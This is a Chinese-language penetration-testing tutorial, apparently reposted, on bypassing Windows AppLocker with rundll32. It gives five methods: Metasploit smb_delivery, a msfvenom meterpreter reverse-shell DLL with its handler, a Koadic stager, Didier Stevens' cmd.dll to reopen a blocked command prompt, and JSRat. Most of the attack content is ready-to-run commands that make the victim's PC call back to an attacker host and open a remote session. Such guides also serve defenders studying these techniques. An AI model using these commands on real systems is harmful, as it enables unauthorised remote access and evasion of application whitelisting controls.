本文演示了將AppLocker旁路列入白名單的最常見和熟悉的技術,眾所周知,出于安全原因,系統管理員添加了組策略來限制本地用戶執行應用,在上一篇文章中,我們討論了“ Windows Applocker策略-入門指南 ”,因為它們定義了應用程式控制策略的AppLocker規則以及如何使用它們,但是今天,您將學習如何通過RunDLL檔案繞過Applocker策略,
目錄表
- 介紹
- DLL檔案的作業
- 好處
- 缺點
- 使用DLL檔案的AppLocker繞過的不同方法
- 結論
介紹
DLL檔案對于Windows的作業系統正常作業非常重要,它還決定了自定義Windows的其他程式的作業,元件(DLL)檔案是為其他程式提供有關如何呼叫某些內容的指令的檔案型別,因此,多個軟體甚至可以同時共享此類DLL檔案,盡管與.exe檔案格式相同,但DLL檔案不能像.exe檔案那樣直接執行,DLL檔案擴展名可以是.dll(元件)、. OCX(ActiveX控制元件)、. CPL(控制面板)、. DRV(設備驅動程式),
加工
使用時,DLL檔案分為幾部分,這使DLL檔案的作業變得容易和快捷,每個部分都在運行時安裝在主程式中,由于每個部分都不同且獨立;加載時間更快,并且僅在需要所述檔案的功能時才完成,此功能還使升級更易于應用,而不會影響其他部分,例如,您有一個字典程式,每個月都會添加新單詞,因此,您要做的就是更新它;無需為其安裝另一個程式,
好處
- 使用更少的資源
- 促進模塊化架構
- 簡化部署和安裝
缺點
- 從屬DLL升級到新版本,
- 從屬DLL是固定的,
- 從屬DLL被早期版本覆寫,
- 從計算機中洗掉了一個依賴的DLL,
方法
- Smb_Delivery
- MSFvenom
- Koadic
- 通過cmd.dll獲取命令提示符(Get-Command Prompt via cmd.dll)
- JSRat
SMB Delivery
因此,我們的方法使用的是smb_delivery,要使用此方法,請在kali中打開終端,然后鍵入以下命令;
msfconsole
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107
msf exploit(windows/smb/smb_delivery) > exploit
現在,通過Windows計算機中的rundll32.exe運行惡意代碼,以獲取Meterpreter會話,
當以上漏洞利用將運行時,它將為您提供要在受害者的PC上執行的命令;為了獲得一個會話,因此,將給定命令復制并粘貼到受害者的PC的運行視窗中,如下圖所示:
rundll32.exe \\192.168.1.107\ZtmW\test.dll,0
一旦執行該命令,您將具有Meterpreter會話,要訪問會話,請輸入:
sessions 1
sysinfo
MsfVeom
我們的第二種方法是通過MSFVenom,要使用此方法,請在kali終端中鍵入以下命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll
創建有效負載后,請在受害者的PC的運行視窗中運行以下命令:
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll
同時,通過鍵入以下內容來啟動multi / handler以獲取會話:
msfconsole
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
Koadic
我們的下一個方法是使用Koadic框架,Koadic是Windows開發后的rootkit,與其他滲透測驗工具(例如Meterpreter和Powershell Empire)相似,要了解有關Koadic的更多資訊,請通過以下鏈接閱讀有關該框架的詳細文章:https ://www.hackingarticles.in/koadic-com-command-control-framework
當koadic啟動并運行后,鍵入:
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
run
運行漏洞利用程式會給您一個命令,將該命令從rundll32.exe復制到6.0”),然后將其粘貼到受害者PC的命令提示符中,
在cmd中運行命令后,即可進行會話,如下圖所示,
要訪問會話,請輸入:
zombies 0
通過cmd.dll獲取命令提示符
現在的難題是,如果在受害者的PC中阻止了命令提示符,該怎么辦,
如果命令列被阻止,則可以使用Didier Stevens開發的腳本來解決小問題,您可以在以下鏈接中找到它們:
//didierstevens.com/files/software/cmd-dll_v0_0_4.zip
在上述URL中,您將下載一個zip檔案,解壓縮該zip檔案,并使用以下命令在運行視窗中運行該檔案:
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll
運行命令后,您將立即取消阻塞該cmd,如下所示:
JSRat
攻擊regsvr32的下一種方法是使用JSRat,您可以從GitHub下載它 ,這是另一個命令和控制框架,就像koadic和Powershell Empire一樣,僅用于rundll32.exe和regsvr32.exe生成惡意任務,JSRat將創建一個Web服務器,并在該Web服務器上找到我們的.js檔案,要使用此方法,請輸入:
./JSRat.py -i 192.168.1.107 -p 4444
JSRat開始作業后,它將為您提供在瀏覽器中打開的鏈接,該網頁將具有將在受害者的PC上執行的代碼,
因此,在瀏覽器中打開//192.168.1.107/wtf鏈接,您將在其中找到所述代碼,如下圖所示:
在受害者計算機的命令提示符中運行該代碼,如下所示:
瞧,您將看到一個會話,如下圖所示:
結論
DLL檔案是各種代碼和程序的集合,這些檔案可幫助Windows程式準確執行,這些檔案是為多個程式創建的,以同時使用它們,此技術有助于保存記憶體,因此,這些檔案很重要,并且Windows要求它們正常運行,而不會給用戶帶來任何型別的問題,因此,通過此類檔案進行的利用非常有效且致命,上面介紹的方法是不同的方法,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/135442.html
標籤:其他
上一篇:BUUCTF-[護網杯 2018]easy_tornado(SSTI)
下一篇:H3CV7設備流量統計配置